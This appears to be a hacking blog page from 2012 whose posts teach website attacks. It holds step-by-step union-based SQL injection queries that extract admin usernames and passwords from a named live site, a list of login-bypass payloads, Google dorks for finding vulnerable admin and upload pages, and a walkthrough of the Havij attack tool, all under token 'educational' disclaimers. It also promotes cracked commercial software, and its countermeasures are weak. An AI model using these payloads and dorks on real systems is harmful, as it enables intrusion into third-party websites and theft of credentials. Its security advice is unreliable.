bolsas femininas

SQl tutorials

Here is the tutorial for hacking website which is vulnerable to SQL injection

SQL injection Tool Havij1.52 pro

Here you can learn how to hack sql vulnerable site with the toll name " HAVIJ"

Full Cracked Antivirus

Here you can get all fully crackrd antivirus

If you are going [...]

Fully Cracked IDM all version

Her you get all the cracked Version Of Internet Download Manager

All Hacking E-Books

Download all hacking Ebooks for free... All network security and E|CEH book

Showing posts with label web site Hacking. Show all posts
Showing posts with label web site Hacking. Show all posts

Tuesday, July 10, 2012

Hacking website full video tutorial

HI Guys.........
Today I have came with the Video tutorial for hacking SQl vulnerable website.
It is full video tutorial which was created by me...
Hope you guys like this tutorial...
Here I have used SQL injection tool called HAVIJ..
This helpful tutorial for Newbi and Guys who is starting in hacking..



Please comment If you like my tutorials and subscribes us.. and like the video...
Thanks ...

Comment here If you like my post...

By Blog Admin with No comments

Tuesday, July 3, 2012

Acunetix 7 Full version Free download


Acunetix is another famous website vulnerability scanner. It comes in both free and commercial version. To download the scanner, signup in their website and you will be getting the download link. The drawback in the free edition, we cannot perform a full web vulnerability scan.
Here I am Going to provide version 7 of Acunetix that is full version... Free for Downloading...

Get Acunetix 7 full Version freom Here

By Blog Admin with No comments

Tuesday, June 26, 2012

SQL Injection Full Tutorial Part-2




Part 2: Injecting SQL queries to extract the admin username and password

Note:- All Tutorial is for educational Purpose only. Please Domt Miss use of it.

Hi Guys.........
This my second tutorial on hacking websites through sql injection attack, first one was using blind sql injection. In this Attack we hack database of Website and through which we can steal credentials and login to website using those credentials. if a site has an admin panel, then you can login to that admin panel and can get hold on whole Website.

Step 1: Find Vulnerable Websites

1.) Go to www.google.com and type : 
    a.)inurl: php?id=.
    b.)inurl: asp?id=
Download Biggest Dork List fron HERE
Password= Redeyehack                  
                                

This Google Dork is used to find websites which uses GET Method and hence may be vulnerable.

2.) After Finding the Website's vulnerable link, Suppose Website link is : 
  http://www.schoolarcade.com.pk/book_detail.php?id=309, Then Try
http://www.schoolarcade.com.pk/book_detail.php?id=309'

Now if you got any sql error like :

  
mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/schoolar/public_html/book_detail.php on line 41
   
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax

Then it Proves that site is Sqli Vulnerable. Now lets move to step 2.

Step 2: Find No of columns in table

1.) type order by 1-- at end of URL so that final URL became : http://www.schoolarcade.com.pk/book_detail.php?id=309 order by 1--

If u don't get error then try, order by 2-- and so on until u got the error. Suppose u got the error at order by 13--

It means there are total of 12 columns in table.

Step 3: Find Vulnerable Columns

1.) now at the end of url type: union select all 1,2,3,4,5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=database(), ad replace id=309 with id=-309 so final url would become:

http://www.schoolarcade.com.pk/book_detail.php?id=-309 union select all 1,2,3,4,5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=database()

Now you can see some numbers on screens as shown in image which shows column numbers which are vulnerable. In image we can see that column no 1,3,5,6,7,8 are vulnerable we will use column 7 and 8 in forgoing steps.

Here we write upto 12 because total no of column we find in previous step are 12. information_schema is a database which keep information of every column, table and constraint of database.

Step 4 : Finding Database version

1.) try this url : http://www.schoolarcade.com.pk/book_detail.php?id=-309 union select all 1,2,3,4,5,6,version(),8,9,10,11,12 from information_schema.tables where table_schema=database()

Here we replaced vulnerable column 7 with the "version()" a function used to display database version.
If it displays version greater than 5 as shown in image below, then you can go ahead otherwise leave this site and find another one.

Step 5 :Finding Table names

1.) Try this url : http://www.schoolarcade.com.pk/book_detail.php?id=-309 union select all 1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12 from information_schema.tables where table_schema=database()

Here we replaced vulnerable column 8 with the "group_concat(table_name)". table_name column of information_schema.tables contain Table names of whole database.

Now you can see in image below it lists all the tables of current database. Here i Found an interesting table admin_users which lists username and passwords of site Administrators.

Step 6: Finding Columns names

1.) Try this url : http://www.schoolarcade.com.pk/book_detail.php?id=-309 union select all 1,2,3,4,5,6,7,group_concat(column_name),9,10,11,12 from information_schema.columns where table_schema=database()

Here we have replaces vulnerable column 8 with "group_concat(column_name)" and also replaced "information_schema.tables" with "information_schema.columns"

Now it will list all columns as shown in image below and we have to find columns related to admin_users table.

Columns corresponding to username and password are : user_id and user_pass. Now we have Table and Column Names. Now we just have to retrieve the data from table.

Step 8 : To retrieve the username and password, Replace vulnerable column 8 with "group_concat(user_id,0x3a,user_pass)", here user_id and user_pass are columns names and ox3a is Hex equivalent of ":" just used to separate username and password. 

Replace string with "from information_schema ...." with "from admin_users" where admin_users is table_name.

Now you can view username and password as "admin::Password"


And Now you have site administrator's username and password also. you just have to find the login page of Admin

Step 9 : Finding Admin Page


1.) You can guess that or can try few common admin page like

  a.) www.site.com/admin/
  b.) www.site.com/administrators
  c.) www.site.com/login.php

After finding the Login Page, login using the above found username and password...

Congrats!!!You have hacked the Website.

This is a manual Sqli Attack You can also use a Tool :


Havij Which will automatically find vulnerability and find all the tables and their data from a site database for you. You can download it from here

Note :This is for Educational Purpose only. Don't try it to cause any harm to any website or its Database

By Blog Admin with No comments

Basic sql injection Full Tutorials Part 1

Part 1 : Basic sql injection

Note:- All Tutorial is for educational Purpose only. Please Domt Miss use of it.

Q what is sql injection?



A injecting sql queries into another database or using queries to get auth bypass as an admin.

Gaining auth bypass on an admin account. Most sites vulnerable to this are .asp. First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:

"inurl:admin.asp"

"inurl:login/admin.asp"

"inurl:admin/login.asp"

"inurl:adminlogin.asp"

"inurl:adminhome.asp"

"inurl:admin_login.asp"

"inurl:administratorlogin.asp"

"inurl:login/administrator.asp"

"inurl:administrator_login.asp"

Now what to do once we get to our site. The site should look something like this :




welcome to xxxxxxxxxx administrator panel
username :

password :

so what we do here is in the username we always type "Admin" and for our password we type our sql injection here is a list of sql injections.

' or '1'='1

' or 'x'='x

' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

'or'1=1'

There are many more but these are the best ones that i know of
and what this sql injection is doing : confusing the fuck out of the database till it gives you auth bypass.
So your input should look like this

Username: Admin

password: 'or'1'='1


So click submit and you'r in

NOTE not all sites are vulnerable.


Note:- All Tutorial is for educational Purpose only. Please Domt Miss use of it.

Comment If you like the tutorials. [Video Tutorials Comming soon]

By Blog Admin with 3 comments

Monday, May 28, 2012

HOW TO HACK WEBSITE WITH TMEDIT POPUP VULNERABILITY

HOW TO HACK WEBSITE WITH TMEDIT POPUP VULNERABILITY


Hi guy,
I am again back with new tutorial to foe hacking Website..

Today I will show you How to hack a website using TMEDIT POPUPS

*It is only for the Educational purposes,don't Misuse It. 

Moderator of this site is responsible for the misuse done by you.

Ok lets start

1) Go to Google
Enter bellow Dork without quotes
“inurl:/editor/tmedit/popups/insert_image_en.php”
Search for a vulnerable website.
IF you found a web page like that

Choose a file, set Path and Upload file.

View you file:
http://www.site.com/images/file.php

Please Comment if you like this post... 

By Blog Admin with 1 comment

Wednesday, May 23, 2012

Super Hide IP v3.2.1.2 Full version Free Downlaod

Super Hide IP v3.2.1.2 Full version Free Downlaod




Hello Frnds Today m give you A Full Version Ip Hider Softwere Free off Cost So enjoy this.

Anonymous Surfing with Super Hide IP
Protect your privacy on the Internet. Use Super Hide IP to surf anonymously, prevent hackers from monitoring your online activities or identity thieves from stealing your identity and other personal information, send anonymous email, and un-ban yourself from forums or restricted websites.


With Super Hide IP, you are able to be assigned one of our fake IP addresses which can be from different countries such as United States, United Kingdom, France, etc. Super Hide IP works with Internet Explorer, Firefox, Opera, Maxthon, MyIE and is compatible with all types of routers, firewalls, home networks, wireless networks and any other kind of Internet.





SuperHide Ip is the best tool to hide your ip address. It is simple and safe to use.

Key Features...

- Anonymous Web Surfing
Click Hide IP button and you will be assigned random IP addresses, preventing others from getting your true IP when surfing the Internet.
- Protect Your Identity
Surf anonymously to prevent others from monitoring your web activity or intercepting your personal information such as your financial information.
- Choose IP Country
You can select to use IP from different countries via “Choose IP Country” option and can Check IP directly.
- Send Anonymous E-mails
Hide your IP in E-mail headers. Be protected while sending e-mails via Yahoo!, Hotmail, GMail.
- Un-ban Yourself from Forums and Restricted Websites
Use Super Hide IP to change your IP which allows you to access any forums or websites that has restricted you.

Download It from HERE

By Blog Admin with 4 comments

Wednesday, February 22, 2012

SQL Injection Tutorial With Havij


SQL Injection Tutorial With Havij



According to a survey the most common technique of hacking a website is SQL Injection. SQL Injection is a technique in which hacker insert SQL codes into web Forum to get Sensitive information like (User Name ,Passwords) to access the site and Deface it. The traditional SQL injection method is quite difficult, but now adays there are many tools available online through which any script kiddie can use SQL Injection to deface a website, because of these tools websites have became more vulnerable to these types of attacks.

One of the popular tools is Havij, Havij is an advanced SQL injection tool which makes SQL Injection very easy for you, Along with SQL injection it has a builtin admin page finder which makes it very effective.

             And
Download latest Havij 1.5 not Cracked From Here
Warning - This article is only for education purposes, By readingthis article you agree that HWP is not responsible in any way for any kind of damage caused by the information provided in this article.

Supported Databases With Havij

MsSQL 2000/2005 with error.

MsSQL 2000/2005 no error union based

MySQL union based

MySQL Blind

MySQL error based

MySQL time based

Oracle union based

MsAccess union based

Sybase (ASE)


Demonstration

Now i will Show you step by step the process of SQL injection.

Step1: Find SQL injection Vulnerability in tour site and insert the string (like http://www.target.com/index.asp?id=123) of it in Havij as show below.


Step2: Now click on the Analyse button as shown below.


Now, if the your Server is Vulnerable the information about the target will appear and the columns will appear like shown in picture below:


Step3: Now click on the Tables button and then click Get Tables button from below column as shown below:


Step4: Now select the Tables with sensitive information and click Get Columns button.After that select the Username and Password Column to get the Username and Password and click on the Get Table button.

Countermeasures:

Here are some of the countermeasures you can take to reduce the risk of SQL Injection

1.Renaming the admin page will make it difficult for a hacker to locate it

3. One of the best method to protect your website against SQL Injection attacks is to disallow special characters in the admin form, though this will make your passwords more vulnerable to bruteforce attacks but you can implement a captcha to prevent these types of attack.


Download SQL Strings here

By Blog Admin with No comments

    • Popular
    • Categories
    • Archives

     
    Blogger Wordpress Gadgets Twitter Bird Gadget